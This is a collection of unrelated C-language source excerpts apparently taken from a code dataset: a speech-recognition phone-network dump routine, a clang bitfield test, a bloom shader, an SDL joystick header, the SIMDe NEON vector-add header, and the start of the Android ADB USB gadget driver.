plist, bitvec_t active, int32 n_sen) { gnode_t *gn; pnode_t *pn; bitvec_clear_all (active, n_sen); for (gn = plist; gn; gn = gnode_next(gn)) { pn = (pnode_t *) gnode_ptr(gn); senone_set_active (active, m->phone[pn->hmm.pid].state, m->n_emit_state); } } /* Used only by the following dump routines */ static mdef_t *tmpmdef; static dict_t *tmpdict; static void pnet_dump_pnode (void *data) { pnode_t *pn; char buf[4096]; pn = (pnode_t *) data; mdef_phone_str (tmpmdef, pn->hmm.pid, buf); if (IS_WID(pn->wid)) printf ("%s.%d.%s\n", dict_wordstr(tmpdict, pn->wid), pn->pos, buf); else printf ("%s.%d.%s\n", "<>", pn->pos, buf); /* Dummy node */ fflush (stdout); } static void pnet_dump_plink (void *data) { pnode_t *pn; plink_t *pl; gnode_t *gn; pnet_dump_pnode (data); pn = (pnode_t *) data; for (gn = pn->succ; gn; gn = gn->next) { pl = (plink_t *) gnode_ptr(gn); printf ("\t\t-> "); pnet_dump_pnode (pl->dst); } fflush (stdout); } void pnet_dump (mdef_t *m, dict_t *d, glist_t pnet) { tmpdict = d; tmpmdef = m; E_INFO("pnodes:\n"); glist_apply_ptr (pnet, pnet_dump_pnode); E_INFO("plinks:\n"); glist_apply_ptr (pnet, pnet_dump_plink); }
{ "language": "C" }
// RUN: %clang_cc1 -emit-llvm %s -o - #ifdef PACKED #define P __attribute__((packed)) #else #define P #endif struct P M_Packed { unsigned int l_Packed; unsigned short k_Packed : 6, i_Packed : 15, j_Packed : 11; }; struct M_Packed sM_Packed; int testM_Packed (void) { struct M_Packed x; return (x.i_Packed != 0); }
{ "language": "C" }
precision lowp float; precision lowp int; #define INSERTION uniform sampler2D sceneTexture; uniform float bloomStrength; uniform float exposure; uniform float gamma; uniform float bloomFactors[5]; uniform vec3 bloomTintColors[5]; #ifdef BLUR_STEP_1_ACTIVE uniform sampler2D blurTexture1; #endif #ifdef BLUR_STEP_2_ACTIVE uniform sampler2D blurTexture2; #endif #ifdef BLUR_STEP_3_ACTIVE uniform sampler2D blurTexture3; #endif #ifdef BLUR_STEP_4_ACTIVE uniform sampler2D blurTexture4; #endif #ifdef BLUR_STEP_5_ACTIVE uniform sampler2D blurTexture5; #endif #ifdef BLEND_WITH_SKYBOX uniform sampler2D skyboxColorTexture; #endif varying vec2 vUV; void main(){ #ifdef BLEND_WITH_SKYBOX vec3 skyboxColor = texture2D(skyboxColorTexture, -vUV).rgb; vec3 tintColor0 = skyboxColor; vec3 tintColor1 = skyboxColor; vec3 tintColor2 = skyboxColor; vec3 tintColor3 = skyboxColor; vec3 tintColor4 = skyboxColor; #else vec3 tintColor0 = bloomTintColors[0]; vec3 tintColor1 = bloomTintColors[1]; vec3 tintColor2 = bloomTintColors[2]; vec3 tintColor3 = bloomTintColors[3]; vec3 tintColor4 = bloomTintColors[4]; #endif vec4 hdrColor = texture2D(sceneTexture, vUV); #ifdef BLUR_STEP_1_ACTIVE hdrColor = hdrColor + (bloomStrength * bloomFactors[0] * vec4(tintColor0.rgb, 1.0) * texture2D(blurTexture1, vUV)); #endif #ifdef BLUR_STEP_2_ACTIVE hdrColor = hdrColor + (bloomStrength * bloomFactors[1] * vec4(tintColor1.rgb, 1.0) * texture2D(blurTexture2, vUV)); #endif #ifdef BLUR_STEP_3_ACTIVE hdrColor = hdrColor + (bloomStrength * bloomFactors[2] * vec4(tintColor2.rgb, 1.0) * texture2D(blurTexture3, vUV)); #endif #ifdef BLUR_STEP_4_ACTIVE hdrColor = hdrColor + (bloomStrength * bloomFactors[3] * vec4(tintColor3.rgb, 1.0) * texture2D(blurTexture4, vUV)); #endif #ifdef BLUR_STEP_5_ACTIVE hdrColor = hdrColor + (bloomStrength * bloomFactors[4] * vec4(tintColor4.rgb, 1.0) * texture2D(blurTexture5, vUV)); #endif vec3 toneMappedColor = vec3(1.0) - exp(-hdrColor.rgb * exposure); toneMappedColor = pow(toneMappedColor, vec3(1.0 / gamma)); gl_FragColor = vec4(toneMappedColor.rgb, hdrColor.a); }
{ "language": "C" }
/* Simple DirectMedia Layer Copyright (C) 1997-2018 Sam Lantinga <slouken@libsdl.org> This software is provided 'as-is', without any express or implied warranty. In no event will the authors be held liable for any damages arising from the use of this software. Permission is granted to anyone to use this software for any purpose, including commercial applications, and to alter it and redistribute it freely, subject to the following restrictions: 1. The origin of this software must not be misrepresented; you must not claim that you wrote the original software. If you use this software in a product, an acknowledgment in the product documentation would be appreciated but is not required. 2. Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software. 3. This notice may not be removed or altered from any source distribution. */ #include <linux/input.h> struct SDL_joylist_item; /* The private structure used to keep track of a joystick */ struct joystick_hwdata { int fd; struct SDL_joylist_item *item; SDL_JoystickGUID guid; char *fname; /* Used in haptic subsystem */ /* The current Linux joystick driver maps hats to two axes */ struct hwdata_hat { int axis[2]; } *hats; /* The current Linux joystick driver maps balls to two axes */ struct hwdata_ball { int axis[2]; } *balls; /* Support for the Linux 2.4 unified input interface */ Uint8 key_map[KEY_MAX]; Uint8 abs_map[ABS_MAX]; struct axis_correct { int used; int coef[3]; } abs_correct[ABS_MAX]; int fresh; /* Steam Controller support */ SDL_bool m_bSteamController; }; /* vi: set ts=4 sw=4 expandtab: */
{ "language": "C" }
/* SPDX-License-Identifier: MIT * * Permission is hereby granted, free of charge, to any person * obtaining a copy of this software and associated documentation * files (the "Software"), to deal in the Software without * restriction, including without limitation the rights to use, copy, * modify, merge, publish, distribute, sublicense, and/or sell copies * of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be * included in all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. * * Copyright: * 2020 Evan Nemerson <evan@nemerson.com> */ #if !defined(SIMDE_ARM_NEON_ADD_H) #define SIMDE_ARM_NEON_ADD_H #include "types.h" HEDLEY_DIAGNOSTIC_PUSH SIMDE_DISABLE_UNWANTED_DIAGNOSTICS SIMDE_BEGIN_DECLS_ SIMDE_FUNCTION_ATTRIBUTES simde_float32x2_t simde_vadd_f32(simde_float32x2_t a, simde_float32x2_t b) { #if defined(SIMDE_ARM_NEON_A32V7_NATIVE) return vadd_f32(a, b); #else simde_float32x2_private r_, a_ = simde_float32x2_to_private(a), b_ = simde_float32x2_to_private(b); #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS) r_.values = a_.values + b_.values; #else SIMDE_VECTORIZE for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) { r_.values[i] = a_.values[i] + b_.values[i]; } #endif return simde_float32x2_from_private(r_); #endif } #if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES) #undef vadd_f32 #define vadd_f32(a, b) simde_vadd_f32((a), (b)) #endif SIMDE_FUNCTION_ATTRIBUTES simde_float64x1_t simde_vadd_f64(simde_float64x1_t a, simde_float64x1_t b) { #if defined(SIMDE_ARM_NEON_A64V8_NATIVE) return vadd_f64(a, b); #else simde_float64x1_private r_, a_ = simde_float64x1_to_private(a), b_ = simde_float64x1_to_private(b); #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS) r_.values = a_.values + b_.values; #else SIMDE_VECTORIZE for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) { r_.values[i] = a_.values[i] + b_.values[i]; } #endif return simde_float64x1_from_private(r_); #endif } #if defined(SIMDE_ARM_NEON_A64V8_ENABLE_NATIVE_ALIASES) #undef vadd_f64 #define vadd_f64(a, b) simde_vadd_f64((a), (b)) #endif SIMDE_FUNCTION_ATTRIBUTES simde_int8x8_t simde_vadd_s8(simde_int8x8_t a, simde_int8x8_t b) { #if defined(SIMDE_ARM_NEON_A32V7_NATIVE) return vadd_s8(a, b); #elif defined(SIMDE_X86_MMX_NATIVE) return _mm_add_pi8(a, b); #else simde_int8x8_private r_, a_ = simde_int8x8_to_private(a), b_ = simde_int8x8_to_private(b); #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS) r_.values = a_.values + b_.values; #else SIMDE_VECTORIZE for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) { r_.values[i] = a_.values[i] + b_.values[i]; } #endif return simde_int8x8_from_private(r_); #endif } #if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES) #undef vadd_s8 #define vadd_s8(a, b) simde_vadd_s8((a), (b)) #endif SIMDE_FUNCTION_ATTRIBUTES simde_int16x4_t simde_vadd_s16(simde_int16x4_t a, simde_int16x4_t b) { #if defined(SIMDE_ARM_NEON_A32V7_NATIVE) return vadd_s16(a, b); #elif defined(SIMDE_X86_MMX_NATIVE) return _mm_add_pi16(a, b); #else simde_int16x4_private r_, a_ = simde_int16x4_to_private(a), b_ = simde_int16x4_to_private(b); #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS) r_.values = a_.values + b_.values; #else SIMDE_VECTORIZE for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) { r_.values[i] = a_.values[i] + b_.values[i]; } #endif return simde_int16x4_from_private(r_); #endif } #if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES) #undef vadd_s16 #define vadd_s16(a, b) simde_vadd_s16((a), (b)) #endif SIMDE_FUNCTION_ATTRIBUTES simde_int32x2_t simde_vadd_s32(simde_int32x2_t a, simde_int32x2_t b) { #if defined(SIMDE_ARM_NEON_A32V7_NATIVE) return vadd_s32(a, b); #elif defined(SIMDE_X86_MMX_NATIVE) return _mm_add_pi32(a, b); #else simde_int32x2_private r_, a_ = simde_int32x2_to_private(a), b_ = simde_int32x2_to_private(b); #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS) r_.values = a_.values + b_.values; #else SIMDE_VECTORIZE for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) { r_.values[i] = a_.values[i] + b_.values[i]; } #endif return simde_int32x2_from_private(r_); #endif } #if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES) #undef vadd_s32 #define vadd_s32(a, b) simde_vadd_s32((a), (b)) #endif SIMDE_FUNCTION_ATTRIBUTES simde_int64x1_t simde_vadd_s64(simde_int64x1_t a, simde_int64x1_t b) { #if defined(SIMDE_ARM_NEON_A32V7_NATIVE) return vadd_s64(a, b); #else simde_int64x1_private r_, a_ = simde_int64x1_to_private(a), b_ = simde_int64x1_to_private(b); #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS) r_.values = a_.values + b_.values; #else SIMDE_VECTORIZE for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) { r_.values[i] = a_.values[i] + b_.values[i]; } #endif return simde_int64x1_from_private(r_); #endif } #if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES) #undef vadd_s64 #define vadd_s64(a, b) simde_vadd_s64((a), (b)) #endif SIMDE_FUNCTION_ATTRIBUTES simde_uint8x8_t simde_vadd_u8(simde_uint8x8_t a, simde_uint8x8_t b) { #if defined(SIMDE_ARM_NEON_A32V7_NATIVE) return vadd_u8(a, b); #else simde_uint8x8_private r_, a_ = simde_uint8x8_to_private(a), b_ = simde_uint8x8_to_private(b); #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS) r_.values = a_.values + b_.values; #else SIMDE_VECTORIZE for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) { r_.values[i] = a_.values[i] + b_.values[i]; } #endif return simde_uint8x8_from_private(r_); #endif } #if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES) #undef vadd_u8 #define vadd_u8(a, b) simde_vadd_u8((a), (b)) #endif SIMDE_FUNCTION_ATTRIBUTES simde_uint16x4_t simde_vadd_u16(simde_uint16x4_t a, simde_uint16x4_t b) { #if defined(SIMDE_ARM_NEON_A32V7_NATIVE) return vadd_u16(a, b); #else simde_uint16x4_private r_, a_ = simde_uint16x4_to_private(a), b_ = simde_uint16x4_to_private(b); #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS) r_.values = a_.values + b_.values; #else SIMDE_VECTORIZE for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) { r_.values[i] = a_.values[i] + b_.values[i]; } #endif return simde_uint16x4_from_private(r_); #endif } #if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES) #undef vadd_u16 #define vadd_u16(a, b) simde_vadd_u16((a), (b)) #endif SIMDE_FUNCTION_ATTRIBUTES simde_uint32x2_t simde_vadd_u32(simde_uint32x2_t a, simde_uint32x2_t b) { #if defined(SIMDE_ARM_NEON_A32V7_NATIVE) return vadd_u32(a, b); #else simde_uint32x2_private r_, a_ = simde_uint32x2_to_private(a), b_ = simde_uint32x2_to_private(b); #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS) r_.values = a_.values + b_.values; #else SIMDE_VECTORIZE for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) { r_.values[i] = a_.values[i] + b_.values[i]; } #endif return simde_uint32x2_from_private(r_); #endif } #if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES) #undef vadd_u32 #define vadd_u32(a, b) simde_vadd_u32((a), (b)) #endif SIMDE_FUNCTION_ATTRIBUTES simde_uint64x1_t simde_vadd_u64(simde_uint64x1_t a, simde_uint64x1_t b) { #if defined(SIMDE_ARM_NEON_A32V7_NATIVE) return vadd_u64(a, b); #else simde_uint64x1_private r_, a_ = simde_uint64x1_to_private(a), b_ = simde_uint64x1_to_private(b); #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS) r_.values = a_.values + b_.values; #else SIMDE_VECTORIZE for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) { r_.values[i] = a_.values[i] + b_.values[i]; } #endif return simde_uint64x1_from_private(r_); #endif } #if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES) #undef vadd_u64 #define vadd_u64(a, b) simde_vadd_u64((a), (b)) #endif SIMDE_FUNCTION_ATTRIBUTES simde_float32x4_t simde_vaddq_f32(simde_float32x4_t a, simde_float32x4_t b) { #if defined(SIMDE_ARM_NEON_A32V7_NATIVE) return vaddq_f32(a, b); #elif defined(SIMDE_X86_SSE_NATIVE) return _mm_add_ps(a, b); #elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE) SIMDE_POWER_ALTIVEC_VECTOR(float) a_ , b_, r_; a_ = a; b_ = b; r_ = vec_add(a_, b_); return r_; #elif defined(SIMDE_WASM_SIMD128_NATIVE) return wasm_f32x4_add(a, b); #else simde_float32x4_private r_, a_ = simde_float32x4_to_private(a), b_ = simde_float32x4_to_private(b); #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS) r_.values = a_.values + b_.values; #else SIMDE_VECTORIZE for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) { r_.values[i] = a_.values[i] + b_.values[i]; } #endif return simde_float32x4_from_private(r_); #endif } #if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES) #undef vaddq_f32 #define vaddq_f32(a, b) simde_vaddq_f32((a), (b)) #endif SIMDE_FUNCTION_ATTRIBUTES simde_float64x2_t simde_vaddq_f64(simde_float64x2_t a, simde_float64x2_t b) { #if defined(SIMDE_ARM_NEON_A64V8_NATIVE) return vaddq_f64(a, b); #elif defined(SIMDE_X86_SSE2_NATIVE) return _mm_add_pd(a, b); #elif defined(SIMDE_POWER_ALTIVEC_P7_NATIVE) return vec_add(a, b); #elif defined(SIMDE_WASM_SIMD128_NATIVE) return wasm_f64x2_add(a, b); #else simde_float64x2_private r_, a_ = simde_float64x2_to_private(a), b_ = simde_float64x2_to_private(b); #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS) r_.values = a_.values + b_.values; #else SIMDE_VECTORIZE for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) { r_.values[i] = a_.values[i] + b_.values[i]; } #endif return simde_float64x2_from_private(r_); #endif } #if defined(SIMDE_ARM_NEON_A64V8_ENABLE_NATIVE_ALIASES) #undef vaddq_f64 #define vaddq_f64(a, b) simde_vaddq_f64((a), (b)) #endif SIMDE_FUNCTION_ATTRIBUTES simde_int8x16_t simde_vaddq_s8(simde_int8x16_t a, simde_int8x16_t b) { #if defined(SIMDE_ARM_NEON_A32V7_NATIVE) return vaddq_s8(a, b); #elif defined(SIMDE_X86_SSE2_NATIVE) return _mm_add_epi8(a, b); #elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE) return vec_add(a, b); #elif defined(SIMDE_WASM_SIMD128_NATIVE) return wasm_i8x16_add(a, b); #else simde_int8x16_private r_, a_ = simde_int8x16_to_private(a), b_ = simde_int8x16_to_private(b); #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS) r_.values = a_.values + b_.values; #else SIMDE_VECTORIZE for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) { r_.values[i] = a_.values[i] + b_.values[i]; } #endif return simde_int8x16_from_private(r_); #endif } #if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES) #undef vaddq_s8 #define vaddq_s8(a, b) simde_vaddq_s8((a), (b)) #endif SIMDE_FUNCTION_ATTRIBUTES simde_int16x8_t simde_vaddq_s16(simde_int16x8_t a, simde_int16x8_t b) { #if defined(SIMDE_ARM_NEON_A32V7_NATIVE) return vaddq_s16(a, b); #elif defined(SIMDE_X86_SSE2_NATIVE) return _mm_add_epi16(a, b); #elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE) return vec_add(a, b); #elif defined(SIMDE_WASM_SIMD128_NATIVE) return wasm_i16x8_add(a, b); #else simde_int16x8_private r_, a_ = simde_int16x8_to_private(a), b_ = simde_int16x8_to_private(b); #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS) r_.values = a_.values + b_.values; #else SIMDE_VECTORIZE for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) { r_.values[i] = a_.values[i] + b_.values[i]; } #endif return simde_int16x8_from_private(r_); #endif } #if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES) #undef vaddq_s16 #define vaddq_s16(a, b) simde_vaddq_s16((a), (b)) #endif SIMDE_FUNCTION_ATTRIBUTES simde_int32x4_t simde_vaddq_s32(simde_int32x4_t a, simde_int32x4_t b) { #if defined(SIMDE_ARM_NEON_A32V7_NATIVE) return vaddq_s32(a, b); #elif defined(SIMDE_X86_SSE2_NATIVE) return _mm_add_epi32(a, b); #elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE) return vec_add(a, b); #elif defined(SIMDE_WASM_SIMD128_NATIVE) return wasm_i32x4_add(a, b); #else simde_int32x4_private r_, a_ = simde_int32x4_to_private(a), b_ = simde_int32x4_to_private(b); #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS) r_.values = a_.values + b_.values; #else SIMDE_VECTORIZE for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) { r_.values[i] = a_.values[i] + b_.values[i]; } #endif return simde_int32x4_from_private(r_); #endif } #if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES) #undef vaddq_s32 #define vaddq_s32(a, b) simde_vaddq_s32((a), (b)) #endif SIMDE_FUNCTION_ATTRIBUTES simde_int64x2_t simde_vaddq_s64(simde_int64x2_t a, simde_int64x2_t b) { #if defined(SIMDE_ARM_NEON_A32V7_NATIVE) return vaddq_s64(a, b); #elif defined(SIMDE_X86_SSE2_NATIVE) return _mm_add_epi64(a, b); #elif defined(SIMDE_POWER_ALTIVEC_P8_NATIVE) return vec_add(a, b); #elif defined(SIMDE_WASM_SIMD128_NATIVE) return wasm_i64x2_add(a, b); #else simde_int64x2_private r_, a_ = simde_int64x2_to_private(a), b_ = simde_int64x2_to_private(b); #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS) r_.values = a_.values + b_.values; #else SIMDE_VECTORIZE for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) { r_.values[i] = a_.values[i] + b_.values[i]; } #endif return simde_int64x2_from_private(r_); #endif } #if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES) #undef vaddq_s64 #define vaddq_s64(a, b) simde_vaddq_s64((a), (b)) #endif SIMDE_FUNCTION_ATTRIBUTES simde_uint8x16_t simde_vaddq_u8(simde_uint8x16_t a, simde_uint8x16_t b) { #if defined(SIMDE_ARM_NEON_A32V7_NATIVE) return vaddq_u8(a, b); #elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE) return vec_add(a, b); #else simde_uint8x16_private r_, a_ = simde_uint8x16_to_private(a), b_ = simde_uint8x16_to_private(b); #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS) r_.values = a_.values + b_.values; #else SIMDE_VECTORIZE for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) { r_.values[i] = a_.values[i] + b_.values[i]; } #endif return simde_uint8x16_from_private(r_); #endif } #if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES) #undef vaddq_u8 #define vaddq_u8(a, b) simde_vaddq_u8((a), (b)) #endif SIMDE_FUNCTION_ATTRIBUTES simde_uint16x8_t simde_vaddq_u16(simde_uint16x8_t a, simde_uint16x8_t b) { #if defined(SIMDE_ARM_NEON_A32V7_NATIVE) return vaddq_u16(a, b); #elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE) return vec_add(a, b); #else simde_uint16x8_private r_, a_ = simde_uint16x8_to_private(a), b_ = simde_uint16x8_to_private(b); #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS) r_.values = a_.values + b_.values; #else SIMDE_VECTORIZE for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) { r_.values[i] = a_.values[i] + b_.values[i]; } #endif return simde_uint16x8_from_private(r_); #endif } #if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES) #undef vaddq_u16 #define vaddq_u16(a, b) simde_vaddq_u16((a), (b)) #endif SIMDE_FUNCTION_ATTRIBUTES simde_uint32x4_t simde_vaddq_u32(simde_uint32x4_t a, simde_uint32x4_t b) { #if defined(SIMDE_ARM_NEON_A32V7_NATIVE) return vaddq_u32(a, b); #elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE) return vec_add(a, b); #else simde_uint32x4_private r_, a_ = simde_uint32x4_to_private(a), b_ = simde_uint32x4_to_private(b); #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS) r_.values = a_.values + b_.values; #else SIMDE_VECTORIZE for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) { r_.values[i] = a_.values[i] + b_.values[i]; } #endif return simde_uint32x4_from_private(r_); #endif } #if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES) #undef vaddq_u32 #define vaddq_u32(a, b) simde_vaddq_u32((a), (b)) #endif SIMDE_FUNCTION_ATTRIBUTES simde_uint64x2_t simde_vaddq_u64(simde_uint64x2_t a, simde_uint64x2_t b) { #if defined(SIMDE_ARM_NEON_A32V7_NATIVE) return vaddq_u64(a, b); #elif defined(SIMDE_POWER_ALTIVEC_P8_NATIVE) return vec_add(a, b); #else simde_uint64x2_private r_, a_ = simde_uint64x2_to_private(a), b_ = simde_uint64x2_to_private(b); #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS) r_.values = a_.values + b_.values; #else SIMDE_VECTORIZE for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) { r_.values[i] = a_.values[i] + b_.values[i]; } #endif return simde_uint64x2_from_private(r_); #endif } #if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES) #undef vaddq_u64 #define vaddq_u64(a, b) simde_vaddq_u64((a), (b)) #endif SIMDE_END_DECLS_ HEDLEY_DIAGNOSTIC_POP #endif /* !defined(SIMDE_ARM_NEON_ADD_H) */
{ "language": "C" }
/* * Gadget Driver for Android ADB * * Copyright (C) 2008 Google, Inc. * Author: Mike Lockwood <lockwood@android.com> * * This software is licensed under the terms of the GNU General Public * License version 2, as published by the Free Software Foundation, and * may be copied, distributed, and modified under those terms. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * */ #include <linux/module.h> #include <linux/init.h> #include <linux/poll.h> #include <linux/delay.h> #include <linux/wait.h> #include <linux/err.h> #include <linux/interrupt.h> #include <linux/sched.h> #include <linux/types.h> #include <linux/device.h> #include <linux/miscdevice.h> #define ADB_BULK_BUFFER_SIZE 4096 /* number of tx requests to allocate */ #define TX_REQ_MAX 4 static const char adb_shortname[] = "android_adb"; struct adb_dev { struct usb_function function; struct usb_composite_dev *cdev; spinlock_t lock; struct usb_ep *ep_in; struct usb_ep *ep_out; int online; int error; atomic_t read_excl; atomic_t write_excl; atomic_t open_excl; struct list_head tx_idle; wait_queue_head_t read_wq; wait_queue_head_t write_wq; struct usb_request *rx_req; int rx_done; }; static struct usb_interface_descriptor adb_interface_desc = { .bLength = USB_DT_INTERFACE_SIZE, .bDescriptorType = USB_DT_INTERFACE, .bInterfaceNumber = 0, .bNumEndpoints = 2, .bInterfaceClass = 0xFF, .bInterfaceSubClass = 0x42, .bInterfaceProtocol = 1, }; static struct usb_endpoint_descriptor adb_superspeed_in_desc = { .bLength = USB_DT_ENDPOINT_SIZE, .bDescriptorType = USB_DT_ENDPOINT, .bEndpointAddress = USB_DIR_IN, .bmAttributes = USB_ENDPOINT_XFER_BULK, .wMaxPacketSize = __constant_cpu_to_le16(1024), }; static struct usb_ss_ep_comp_descriptor adb_superspeed_in_comp_desc = { .bLength = sizeof(adb_superspeed_in_comp_desc), .bDescriptorType = USB_DT_SS_ENDPOINT_COMP, /*.bMaxBurst = DYNAMIC, */ }; static struct usb_endpoint_descriptor adb_superspeed_out_desc = { .bLength = USB_DT_ENDPOINT_SIZE, .bDescriptorType = USB_DT_ENDPOINT, .bEndpointAddress = USB_DIR_OUT, .bmAttributes = USB_ENDPOINT_XFER_BULK, .wMaxPacketSize = __constant_cpu_to_le16(1024), }; static struct usb_ss_ep_comp_descriptor adb_superspeed_out_comp_desc = { .bLength = sizeof(adb_superspeed_out_comp_desc), .bDescriptorType = USB_DT_SS_ENDPOINT_COMP, /*.bMaxBurst = DYNAMIC, */ }; static struct usb_endpoint_descriptor adb_highspeed_in_desc = { .bLength = USB_DT_ENDPOINT_SIZE, .bDescriptorType = USB_DT_ENDPOINT, .bEndpointAddress = USB_DIR_IN, .bmAttributes = USB_ENDPOINT_XFER_BULK, .wMaxPacketSize = __constant_cpu_to_le16(512), }; static struct usb_endpoint_descriptor adb_highspeed_out_desc = { .bLength = USB_DT_ENDPOINT_SIZE, .bDescriptorType = USB_DT_ENDPOINT, .bEndpointAddress = USB_DIR_OUT, .bmAttributes = USB_ENDPOINT_XFER_BULK, .wMaxPacketSize = __constant_cpu_to_le16(512), }; static struct usb_endpoint_descriptor adb_fullspeed_in_desc = { .bLength = USB_DT_ENDPOINT_SIZE, .bDescriptorType = USB_DT_ENDPOINT, .bEndpointAddress = USB_DIR_IN, .bmAttributes = USB_ENDPOINT_XFER_BULK, }; static struct usb_endpoint_descriptor adb_fullspeed_out_desc = { .bLength = USB_DT_ENDPOINT_SIZE, .bDescriptorType = USB_DT_ENDPOINT, .bEndpointAddress = USB_DIR_OUT, .bmAttributes = USB_ENDPOINT_XFER_BULK, }; static struct usb_descriptor_header *fs_adb_descs[] = { (struct usb_descriptor_header *) &adb_interface_desc, (struct usb_descriptor_header *) &adb_fullspeed_in_desc, (struct usb_descriptor_header *) &adb_fullspeed_out_desc, NULL, }; static struct usb_descriptor_header *hs_adb_descs[] = { (struct usb_descriptor_header *) &adb_interface_desc, (struct usb_descriptor_header *) &adb_highspeed_in_desc, (struct usb_descriptor_header *) &adb_highspeed_out_desc, NULL, }; static struct usb_descriptor_header *ss_adb_descs[] = { (struct usb_descriptor_header *) &adb_interface_desc, (struct usb_descriptor_header *) &adb_superspeed_in_desc, (struct usb_descriptor_header *) &adb_superspeed_in_comp_desc, (struct usb_descriptor_header *) &adb_superspeed_out_desc, (struct usb_descriptor_header *) &adb_superspeed_out_comp_desc, NULL, }; static void adb_ready_callback(void); static void adb_closed_callback(void); /* temporary variable used between adb_open() and adb_gadget_bind() */ static struct adb_dev *_adb_dev; static inline struct adb_dev *func_to_adb(struct usb_function *f) { return container_of(f, struct adb_dev, function); } static struct usb_request *adb_request_new(struct usb_ep *ep, int buffer_size) { struct usb_request *req = usb_ep_alloc_request(ep, GFP_KERNEL); if (!req) return NULL; /* now allocate buffers for the requests */ req->buf = kmalloc(buffer_size, GFP_KERNEL); if (!req->buf) { usb_ep_free_request(ep, req); return NULL; } return req; } static void adb_request_free(struct usb_request *req, struct usb_ep *ep) { if (req) { kfree(req->buf); 